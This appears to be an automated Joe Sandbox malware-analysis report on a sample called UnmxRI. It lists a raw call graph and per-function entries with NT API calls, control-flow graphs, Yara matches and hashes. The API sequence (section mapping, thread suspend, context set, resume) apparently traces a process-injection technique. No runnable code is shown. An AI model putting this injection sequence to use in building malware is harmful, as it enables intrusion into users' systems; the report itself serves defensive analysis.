96597 41d946 96597->96584 96598 41d9a3 96597->96598 96600 41d972 96597->96600 96642 418793 NtMapViewOfSection LdrLoadDll 96597->96642 96601 42a3e3 2 API calls 96598->96601 96607 41db84 96599->96607 96608 41da4d 96599->96608 96604 428603 2 API calls 96600->96604 96605 41d9b3 96601->96605 96606 41d982 96604->96606 96643 425b23 NtDelayExecution LdrLoadDll 96606->96643 96611 42a3e3 2 API calls 96607->96611 96645 428693 LdrLoadDll 96608->96645 96612 41db9b 96611->96612 96613 41da6c 96646 41a643 96613->96646 96615 41dad5 96615->96588 96616 41dae0 96615->96616 96617 42a3e3 2 API calls 96616->96617 96618 41db04 96617->96618 96653 427f93 LdrLoadDll 96618->96653 96620 41db18 96654 427ed3 96620->96654 96622 41db3f 96623 41db46 96622->96623 96663 427f93 LdrLoadDll 96622->96663 96625 41db6c 96664 427b43 96625->96664 96627 41db7a 96628->96587 96630 42b563 96629->96630 96631 42a4c3 2 API calls 96630->96631 96632 42b5c0 96630->96632 96633 42b59d 96631->96633 96632->96591 96634 42a3e3 2 API calls 96633->96634 96634->96632 96635->96596 96637 427d50 96636->96637 96638 4295e3 LdrLoadDll 96637->96638 96639 427d61 96638->96639 96673 18e2c0a 96639->96673 96640 41d93e 96640->96592 96640->96597 96642->96600 96643->96598 96644->96599 96645->96613 96647 41a660 96646->96647 96676 427e23 96647->96676 96649 41a6b0 96650 41a6b7 96649->96650 96651 427ed3 2 API calls 96649->96651 96650->96615 96652 41a6e0 96651->96652 96652->96615 96653->96620 96655 427ef4 96654->96655 96656 427f49 96654->96656 96658 4295e3 LdrLoadDll 96655->96658 96657 4295e3 LdrLoadDll 96656->96657 96659 427f5f 96657->96659 96660 427f11 96658->96660 96659->96622 96689 40ab63 96660->96689 96662 427f42 96662->96622 96663->96625 96665 427b99 96664->96665 96666 427b64 96664->96666 96668 4295e3 LdrLoadDll 96665->96668 96667 4295e3 LdrLoadDll 96666->96667 96669 427b81 96667->96669 96670 427baf 96668->96670 96693 40a523 96669->96693 96670->96627 96672 427b92 96672->96627 96674 18e2c1f LdrInitializeThunk 96673->96674 96675 18e2c11 96673->96675 96674->96640 96675->96640 96677 427e8a 96676->96677 96678 427e41 96676->96678 96679 4295e3 LdrLoadDll 96677->96679 96680 4295e3 LdrLoadDll 96678->96680 96681 427ea0 96679->96681 96682 427e5e 96680->96682 96681->96649 96685 40a943 96682->96685 96684 427e83 96684->96649 96686 40a968 96685->96686 96687 40aa85 NtCreateSection 96686->96687 96688 40aab4 96687->96688 96688->96684 96692 40ab88 96689->96692 96690 40aca5 NtMapViewOfSection 96691 40ace0 96690->96691 96691->96662 96692->96690 96695 40a548 96693->96695 96694 40a665 NtResumeThread 96696 40a680 96694->96696 96695->96694 96696->96672 96697 41a793 96705 427933 96697->96705 96699 41a7d7 96700 41a7f8 96699->96700 96712 427ac3 96699->96712 96702 41a7e8 96703 41a804 96702->96703 96704 428603 2 API calls 96702->96704 96704->96700 96706 427951 96705->96706 96707 42798e 96705->96707 96709 4295e3 LdrLoadDll 96706->96709 96708 4295e3 LdrLoadDll 96707->96708 96710 4279a4 96708->96710 96711 42796e 96709->96711 96710->96699 96711->96699 96713 427ae4 96712->96713 96714 427b19 96712->96714 96716 4295e3 LdrLoadDll 96713->96716 96715 4295e3 LdrLoadDll 96714->96715 96718 427b2f 96715->96718 96717 427b01 96716->96717 96721 409ef3 96717->96721 96718->96702 96720 427b12 96720->96702 96723 409f18 96721->96723 96722 40a035 NtSuspendThread 96724 40a050 96722->96724 96723->96722 96724->96720 96549 418768 96550 428603 2 API calls 96549->96550 96551 418772 96550->96551 96725 401b79 96726 401b63 96725->96726 96727 401b8d 96725->96727 96730 42b963 96727->96730 96733 429fd3 96730->96733 96734 429ff9 96733->96734 96745 4164b3 96734->96745 96736 42a00f 96744 401cfc 96736->96744 96748 41a5b3 96736->96748 96738 42a02e 96742 42a043 96738->96742 96764 428963 96738->96764 96741 42a052 96743 428963 2 API calls 96741->96743 96760 4263d3 96742->96760 96743->96744 96747 4164c0 96745->96747 96768 416403 96745->96768 96747->96736 96749 41a5df 96748->96749 96790 417913 96749->96790 96751 41a5f1 96794 41a4a3 96751->96794 96754 41a624 96756 41a635 96754->96756 96759 428603 2 API calls 96754->96759 96755 41a60c 96757 41a617 96755->96757 96758 428603 2 API calls 96755->96758 96756->96738 96757->96738 96758->96757 96759->96756 96761 42642d 96760->96761 96763 42643a 96761->96763 96822 4180b3 96761->96822 96763->96741 96765 42897d 96764->96765 96766 4295e3 LdrLoadDll 96765->96766 96767 42898a ExitProcess 96766->96767 96767->96742 96769 41641a 96768->96769 96785 4254a3 LdrLoadDll 96768->96785 96775 425503 96769->96775 96772 416426 96774 416433 96772->96774 96778 428f83 96772->96778 96774->96747 96786 428873 96775->96786 96780 428f9b 96778->96780 96779 428fbf 96779->96774 96780->96779 96781 427d33 2 API calls 96780->96781 96782 429014 96781->96782 96783 42a3e3 2 API calls 96782->96783 96784 42902d 96783->96784 96784->96774 96785->96769 96787 428890 96786->96787 96788 4295e3 LdrLoadDll 96787->96788 96789 425520 96788->96789 96789->96772 96791 417959 96790->96791 96804 4177a3 LdrLoadDll 96791->96804 96793 4179ec 96793->96751 96795 41a4bd 96794->96795 96803 41a599 96794->96803 96805 417863 96795->96805 96797 41a502 96810 427d83 96797->96810 96799 41a547 96814 427dd3 96799->96814 96802 428603 2 API calls 96802->96803 96803->96754 96803->96755 96804->96793 96806 417888 96805->96806 96807 417893 96806->96807 96820 4177a3 LdrLoadDll 96806->96820 96807->96797 96809 4178db 96809->96797 96811 427d9d 96810->96811 96812 4295e3 LdrLoadDll 96811->96812 96813 427dae 96812->96813 96813->96799 96815 427ded 96814->96815 96816 4295e3 LdrLoadDll 96815->96816 96817 427dfe 96816->96817 96821 18e35c0 LdrInitializeThunk 96817->96821 96818 41a58d 96818->96802 96820->96809 96821->96818 96825 4180dd 96822->96825 96823 41854b 96823->96763 96825->96823 96848 4234e3 96825->96848 96826 41817c 96826->96823 96851 413ed3 96826->96851 96828 4181ea 96828->96823 96829 42a3e3 2 API calls 96828->96829 96831 418202 96829->96831 96830 418231 96832 41a643 3 API calls 96830->96832 96836 418238 96830->96836 96831->96830 96866 406e43 96831->96866 96833 418271 96832->96833 96833->96823 96835 427ed3 2 API calls 96833->96835 96835->96836 96836->96823 96870 4279c3 96836->96870 96838 4182ce 96879 427a43 96838->96879 96840 4182ee 96841 4184d7 96840->96841 96888 406eb3 96840->96888 96842 427b43 2 API calls 96841->96842 96844 4184fa 96841->96844 96842->96844 96846 41851a 96844->96846 96893 41a813 96844->96893 96847 428963 2 API calls 96846->96847 96847->96823 96897 42a353 96848->96897 96850 423504 96850->96826 96852 413eef 96851->96852 96854 413f35 96851->96854 96853 414043 96852->96853 96852->96854 96858 41a813 2 API calls 96852->96858 96853->96828 96854->96853 96865 41400f 96854->96865 96913 413673 96854->96913 96857 414023 96857->96853 96935 41a8b3 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96857->96935 96858->96852 96860 414039 96860->96828 96862 413f6f 96863 414005 96862->96863 96862->96865 96926 426573 96862->96926 96931 413933 96863->96931 96865->96853 96934 41a8b3 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96865->96934 96867 406e73 96866->96867 96868 41a813 2 API calls 96867->96868 96869 406e94 96867->96869 96868->96867 96869->96830 96871 4279e1 96870->96871 96872 427a16 96870->96872 96873 4295e3 LdrLoadDll 96871->96873 96874 4295e3 LdrLoadDll 96872->96874 96875 4279fe 96873->96875 96876 427a2c 96874->96876 96956 40a103 96875->96956 96876->96838 96878 427a0f 96878->96838 96880 427a64 96879->96880 96881 427a99 96879->96881 96882 4295e3 LdrLoadDll 96880->96882 96883 4295e3 LdrLoadDll 96881->96883 96884 427a81 96882->96884 96885 427aaf 96883->96885 96960 40a313 96884->96960 96885->96840 96887 427a92 96887->96840 96892 406ed3 96888->96892 96889 41a813 2 API calls 96889->96892 96890 406efa 96890->96841 96891 406ef3 96891->96841 96892->96889 96892->96890 96892->96891 96894 41a826 96893->96894 96964 427c63 96894->96964 96896 41a851 96896->96844 96900 428733 96897->96900 96899 42a384 96899->96850 96901 428754 96900->96901 96902 428799 96900->96902 96904 4295e3 LdrLoadDll 96901->96904 96903 4295e3 LdrLoadDll 96902->96903 96905 4287af 96903->96905 96906 428771 96904->96906 96905->96899 96909 40b853 96906->96909 96908 428792 96908->96899 96912 40b86e 96909->96912 96910 40b995 NtAllocateVirtualMemory 96911 40b9c0 96910->96911 96911->96908 96912->96910 96914 413683 96913->96914 96915 41367e 96913->96915 96916 42a353 2 API calls 96914->96916 96915->96862 96920 4136a8 96916->96920 96917 41370f 96917->96862 96919 413715 96921 41373f 96919->96921 96923 428823 2 API calls 96919->96923 96920->96917 96920->96919 96924 42a353 2 API calls 96920->96924 96936 427ce3 96920->96936 96942 428823 96920->96942 96921->96862 96925 413730 96923->96925 96924->96920 96925->96862 96927 4265d0 96926->96927 96928 42660b 96927->96928 96950 414053 96927->96950 96928->96862 96930 4265ed 96930->96862 96932 413955 96931->96932 96933 428823 2 API calls 96931->96933 96932->96865 96933->96932 96934->96857 96935->96860 96937 427cfd 96936->96937 96938 4295e3 LdrLoadDll 96937->96938 96939 427d0e 96938->96939 96948 18e2df0 LdrInitializeThunk 96939->96948 96940 427d25 96940->96920 96943 42883d 96942->96943 96944 4295e3 LdrLoadDll 96943->96944 96945 42884e 96944->96945 96949 18e2c70 LdrInitializeThunk 96945->96949 96946 428865 96946->96920 96948->96940 96949->96946 96952 414028 96950->96952 96951 414045 96951->96930 96952->96951 96955 41a8b3 LdrLoadDll RtlFreeHeap LdrInitializeThunk 96952->96955 96954 414039 96954->96930 96955->96954 96959 40a128 96956->96959 96957 40a245 NtGetContextThread 96958 40a260 96957->96958 96958->96878 96959->96957 96963 40a338 96960->96963 96961 40a455 NtSetContextThread 96962 40a470 96961->96962 96962->96887 96963->96961 96965 427c81 96964->96965 96966 427cb6 96964->96966 96967 4295e3 LdrLoadDll 96965->96967 96968 4295e3 LdrLoadDll 96966->96968 96969 427c9e 96967->96969 96972 427ccc 96968->96972 96973 40b433 96969->96973 96971 427caf 96971->96896 96972->96896 96976 40b458 96973->96976 96974 40b575 NtDelayExecution 96975 40b591 96974->96975 96975->96971 96976->96974 96552 18e2b60 LdrInitializeThunk

                                  Executed Functions

                                  Function 0040AD93 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 196 40ad93-40adb2 197 40adb8-40adf7 call 4099a3 196->197 198 40adb3 call 409993 196->198 201 40aed5-40af0e NtCreateFile 197->201 202 40adfd-40ae42 call 409a33 call 42b9e2 call 409903 call 42b9e2 197->202 198->197 203 40af14-40af1b 201->203 204 40afab-40afb7 201->204 224 40ae4d-40ae53 202->224 206 40af26-40af2c 203->206 208 40af54-40af58 206->208 209 40af2e-40af52 206->209 212 40af9a-40afa8 call 409a33 208->212 213 40af5a-40af61 208->213 209->206 212->204 215 40af6c-40af72 213->215 215->212 219 40af74-40af98 215->219 219->215 225 40ae55-40ae79 224->225 226 40ae7b-40ae7f 224->226 225->224 226->201 228 40ae81-40ae9c 226->228 229 40aea7-40aead 228->229 229->201 230 40aeaf-40aed3 229->230 230->229
                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040AF01
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 6c6f08a8a26e60f00a0cf3560f50c06e82be3cc100f0155c705bb3bddea5e0f9
                                  • Instruction ID: 808193d5d4fc7e1358bcd25f2ec58bb31470aa0ce63a101ad7f2c5002c2100f8
                                  • Opcode Fuzzy Hash: 6c6f08a8a26e60f00a0cf3560f50c06e82be3cc100f0155c705bb3bddea5e0f9
                                  • Instruction Fuzzy Hash: DC813DB1E04258DFCB04CFA9C890AEDBBF5AF4D304F18816AE459B7341D638A952CF95
                                  Function 0040AB63 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 232 40ab63-40ab82 233 40ab88-40abc7 call 4099a3 232->233 234 40ab83 call 409993 232->234 237 40aca5-40acda NtMapViewOfSection 233->237 238 40abcd-40ac12 call 409a33 call 42b9e2 call 409903 call 42b9e2 233->238 234->233 239 40ace0-40ace7 237->239 240 40ad77-40ad83 237->240 260 40ac1d-40ac23 238->260 242 40acf2-40acf8 239->242 245 40ad20-40ad24 242->245 246 40acfa-40ad1e 242->246 247 40ad66-40ad74 call 409a33 245->247 248 40ad26-40ad2d 245->248 246->242 247->240 251 40ad38-40ad3e 248->251 251->247 254 40ad40-40ad64 251->254 254->251 261 40ac25-40ac49 260->261 262 40ac4b-40ac4f 260->262 261->260 262->237 263 40ac51-40ac6c 262->263 265 40ac77-40ac7d 263->265 265->237 266 40ac7f-40aca3 265->266 266->265
                                  APIs
                                  • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00407004,?,?,?,00000000), ref: 0040ACCD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SectionView
                                  • String ID:
                                  • API String ID: 1323581903-0
                                  • Opcode ID: 2595418b647e39e8cb9729be06c043157dd9df59609638f224736570bb7437b5
                                  • Instruction ID: 81c3670f9a801113ab1744733425f4ec2f53894f04874442df0eee1ccc7dde67
                                  • Opcode Fuzzy Hash: 2595418b647e39e8cb9729be06c043157dd9df59609638f224736570bb7437b5
                                  • Instruction Fuzzy Hash: FA713CB1E042589FDB04CFA9C490AEDBBF1AF8D304F18816AE859B7341D638A952CF55
                                  Function 0040AFC3 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 268 40afc3-40b027 call 409993 call 4099a3 273 40b105-40b136 NtReadFile 268->273 274 40b02d-40b072 call 409a33 call 42b9e2 call 409903 call 42b9e2 268->274 276 40b1d3-40b1df 273->276 277 40b13c-40b143 273->277 296 40b07d-40b083 274->296 279 40b14e-40b154 277->279 280 40b156-40b17a 279->280 281 40b17c-40b180 279->281 280->279 284 40b1c2-40b1d0 call 409a33 281->284 285 40b182-40b189 281->285 284->276 288 40b194-40b19a 285->288 288->284 291 40b19c-40b1c0 288->291 291->288 297 40b085-40b0a9 296->297 298 40b0ab-40b0af 296->298 297->296 298->273 300 40b0b1-40b0cc 298->300 301 40b0d7-40b0dd 300->301 301->273 302 40b0df-40b103 301->302 302->301
                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B129
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1885d42dce217acca8c2b304d8ce4fae3eaa0ec178be8ae361be51d7cf531833
                                  • Instruction ID: 26c5ef9b7a87aaf3788a36da68adafc6f7274a555f62abf52eb1392f6f8e0f60
                                  • Opcode Fuzzy Hash: 1885d42dce217acca8c2b304d8ce4fae3eaa0ec178be8ae361be51d7cf531833
                                  • Instruction Fuzzy Hash: B9711DB1E04158DFCB04CFA9C891AEEBBF5AF49304F18816AE859B7341D734A941CF98
                                  Function 0040A943 Relevance: 1.7, APIs: 1, Instructions: 180nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 304 40a943-40a9a7 call 409993 call 4099a3 309 40aa85-40aaae NtCreateSection 304->309 310 40a9ad-40a9f2 call 409a33 call 42b9e2 call 409903 call 42b9e2 304->310 312 40aab4-40aabb 309->312 313 40ab4b-40ab57 309->313 332 40a9fd-40aa03 310->332 314 40aac6-40aacc 312->314 317 40aaf4-40aaf8 314->317 318 40aace-40aaf2 314->318 321 40ab3a-40ab48 call 409a33 317->321 322 40aafa-40ab01 317->322 318->314 321->313 324 40ab0c-40ab12 322->324 324->321 327 40ab14-40ab38 324->327 327->324 333 40aa05-40aa29 332->333 334 40aa2b-40aa2f 332->334 333->332 334->309 336 40aa31-40aa4c 334->336 337 40aa57-40aa5d 336->337 337->309 338 40aa5f-40aa83 337->338 338->337
                                  APIs
                                  • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,00406FC1,00000000,?,?,08000000), ref: 0040AAA1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateSection
                                  • String ID:
                                  • API String ID: 2449625523-0
                                  • Opcode ID: c95e034a66444a2b019897d2a2771f6fea0de82bca183c42b18c75903f8a6577
                                  • Instruction ID: e0a1b2b7deb2ed38411ba6ee8e81e80515c1373ee109460b596f0b5dd9ca65be
                                  • Opcode Fuzzy Hash: c95e034a66444a2b019897d2a2771f6fea0de82bca183c42b18c75903f8a6577
                                  • Instruction Fuzzy Hash: A5713EB1E04258DFCB04CFA9C590AEDBBF1AF49304F18816AE859B7381D738A952CF55
                                  Function 0040B853 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 340 40b853-40b8b7 call 409993 call 4099a3 346 40b995-40b9ba NtAllocateVirtualMemory 340->346 347 40b8bd-40b902 call 409a33 call 42b9e2 call 409903 call 42b9e2 340->347 348 40b9c0-40b9c7 346->348 349 40ba57-40ba63 346->349 369 40b90d-40b913 347->369 351 40b9d2-40b9d8 348->351 354 40ba00-40ba04 351->354 355 40b9da-40b9fe 351->355 358 40ba46-40ba54 call 409a33 354->358 359 40ba06-40ba0d 354->359 355->351 358->349 361 40ba18-40ba1e 359->361 361->358 364 40ba20-40ba44 361->364 364->361 370 40b915-40b939 369->370 371 40b93b-40b93f 369->371 370->369 371->346 373 40b941-40b95c 371->373 374 40b967-40b96d 373->374 374->346 375 40b96f-40b993 374->375 375->374
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B9AD
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e3df1edf11f7b77f187d5cbfca1df00d3f7fd211ded7433eb62b877acc962b52
                                  • Instruction ID: faeabf82201d7bcf38129071cb3f3fa61905164f8008550d8f5ed8db4af9d9e4
                                  • Opcode Fuzzy Hash: e3df1edf11f7b77f187d5cbfca1df00d3f7fd211ded7433eb62b877acc962b52
                                  • Instruction Fuzzy Hash: B2711EB1E04158DFCB05CFA9C491AEDBBF1AF49314F18806AE555B7341D738A942CF98
                                  Function 0040A103 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 414 40a103-40a167 call 409993 call 4099a3 419 40a245-40a25a NtGetContextThread 414->419 420 40a16d-40a1b2 call 409a33 call 42b9e2 call 409903 call 42b9e2 414->420 421 40a260-40a267 419->421 422 40a2f7-40a303 419->422 442 40a1bd-40a1c3 420->442 424 40a272-40a278 421->424 427 40a2a0-40a2a4 424->427 428 40a27a-40a29e 424->428 431 40a2e6-40a2f4 call 409a33 427->431 432 40a2a6-40a2ad 427->432 428->424 431->422 434 40a2b8-40a2be 432->434 434->431 437 40a2c0-40a2e4 434->437 437->434 443 40a1c5-40a1e9 442->443 444 40a1eb-40a1ef 442->444 443->442 444->419 446 40a1f1-40a20c 444->446 447 40a217-40a21d 446->447 447->419 448 40a21f-40a243 447->448 448->447
                                  APIs
                                  • NtGetContextThread.NTDLL(?,?), ref: 0040A24D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: bdf3e5888329a096d66a0f5317627066ecb53849a9f42e447e9c800c43d17991
                                  • Instruction ID: 11fd44d7a11e00ebd4639afa207f627f94aff47782750b85f91d5fb369a65e0f
                                  • Opcode Fuzzy Hash: bdf3e5888329a096d66a0f5317627066ecb53849a9f42e447e9c800c43d17991
                                  • Instruction Fuzzy Hash: 3E714D70E04258DFCB04CFA9C490AEDBBF1AF49304F1880AAE455B7381D639AA51CF55
                                  Function 0040A313 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtSetContextThread.NTDLL(?,?), ref: 0040A45D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ContextThread
                                  • String ID:
                                  • API String ID: 1591575202-0
                                  • Opcode ID: 83046a08d27a2416826d03a4e64bb9722fd38081ed525da0b9279bde07223586
                                  • Instruction ID: ae6af8348d5e2835efa0acd1e2774223c170520a6bccfa932cef059285a032e6
                                  • Opcode Fuzzy Hash: 83046a08d27a2416826d03a4e64bb9722fd38081ed525da0b9279bde07223586
                                  • Instruction Fuzzy Hash: 287150B4E04258DFCB04CFA9C890AEDBBF1AF49304F18806AE859B7381D738A951DF55
                                  Function 0040B433 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtDelayExecution.NTDLL(0041A851,?,?,?,00000000), ref: 0040B57E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DelayExecution
                                  • String ID:
                                  • API String ID: 1249177460-0
                                  • Opcode ID: b4c2d22bed6298bec12baf8d5aebfa4085ce205eb12ef6c928226af543862928
                                  • Instruction ID: 05c21ed3b8fbf34fef8b822d91ef9447d4cbb7e0868f63640176225ee5fd43d4
                                  • Opcode Fuzzy Hash: b4c2d22bed6298bec12baf8d5aebfa4085ce205eb12ef6c928226af543862928
                                  • Instruction Fuzzy Hash: 57712EB1E04158DFCB04CFA9D891AEDBBF1AF49304F1880AAE455B7381D738A941DF99
                                  Function 0040A523 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtResumeThread.NTDLL(004070A5,?,?,?,?), ref: 0040A66D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 9cb932c0315a67ac9c852c2db92a7c66480854907fabd7cd58b331431f25be41
                                  • Instruction ID: c929509a18c6c59c28b3246db7812d58a09bd30f22b7ffcb7c13801eaab6805c
                                  • Opcode Fuzzy Hash: 9cb932c0315a67ac9c852c2db92a7c66480854907fabd7cd58b331431f25be41
                                  • Instruction Fuzzy Hash: 9E717CB0E04258DFCF04CFA9C890AEDBBF1AF49304F1880AAE455B7381D639A952CF55
                                  Function 00409EF3 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 377 409ef3-409f12 378 409f18-409f57 call 4099a3 377->378 379 409f13 call 409993 377->379 382 40a035-40a04a NtSuspendThread 378->382 383 409f5d-409fa2 call 409a33 call 42b9e2 call 409903 call 42b9e2 378->383 379->378 385 40a050-40a057 382->385 386 40a0e7-40a0f3 382->386 406 409fad-409fb3 383->406 387 40a062-40a068 385->387 389 40a090-40a094 387->389 390 40a06a-40a08e 387->390 392 40a0d6-40a0e4 call 409a33 389->392 393 40a096-40a09d 389->393 390->387 392->386 397 40a0a8-40a0ae 393->397 398 40a09f-40a0a5 393->398 397->392 403 40a0b0-40a0d4 397->403 398->397 403->398 407 409fb5-409fd9 406->407 408 409fdb-409fdf 406->408 407->406 408->382 409 409fe1-409ffc 408->409 411 40a007-40a00d 409->411 411->382 412 40a00f-40a033 411->412 412->411
                                  APIs
                                  • NtSuspendThread.NTDLL(?,?), ref: 0040A03D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SuspendThread
                                  • String ID:
                                  • API String ID: 3178671153-0
                                  • Opcode ID: eadf37b0ebc10b6c1487c18c073f48f84bb23465c486073ff16662b43e384083
                                  • Instruction ID: 20d8de7c557ead72686c067c0c30bef5db89e3c1e87048ecc75adcaa4e5a3784
                                  • Opcode Fuzzy Hash: eadf37b0ebc10b6c1487c18c073f48f84bb23465c486073ff16662b43e384083
                                  • Instruction Fuzzy Hash: 22714CB1E0425CDFCB04CFA9C890AEDBBF1AF49304F1880AAE455B7381D639A952DF55
                                  Function 00417583 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004175F5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction ID: bf7d9a548e165585386690a979c625089be19cab6857ca41d1b0235f1bc70cb3
                                  • Opcode Fuzzy Hash: deaf350e4e85b77409359b01acaf9a46a1a004313a1d6a861bb488262364818c
                                  • Instruction Fuzzy Hash: 12011EB5E0420DBBDB10DAE5DC42FDEB778AB54308F00819AE90897241F635EB548BA5
                                  Function 00428603 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(0041A7F8,?,?,00000000,?,0041A7F8,?,?,?,?,?,?,?,?,00000000,?), ref: 0042863A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_400000_UnmxRI.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction ID: 3279074c17d7b690db1f2d3af44d07591e404a2f5c5f886217711e7ecd807d27
                                  • Opcode Fuzzy Hash: 7af6edf71fa789115a6df322c687ea2593d7948ce36acc1e33c1234602a48b09
                                  • Instruction Fuzzy Hash: 1AE04F767402147BD610FA5ADC01FABB7ACDBC5714F808019FA48A7242CE76B91187F4
                                  Function 018E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 223950775bd89aedc105007af6250a8d62a0853226863e749bb097a5168400ba
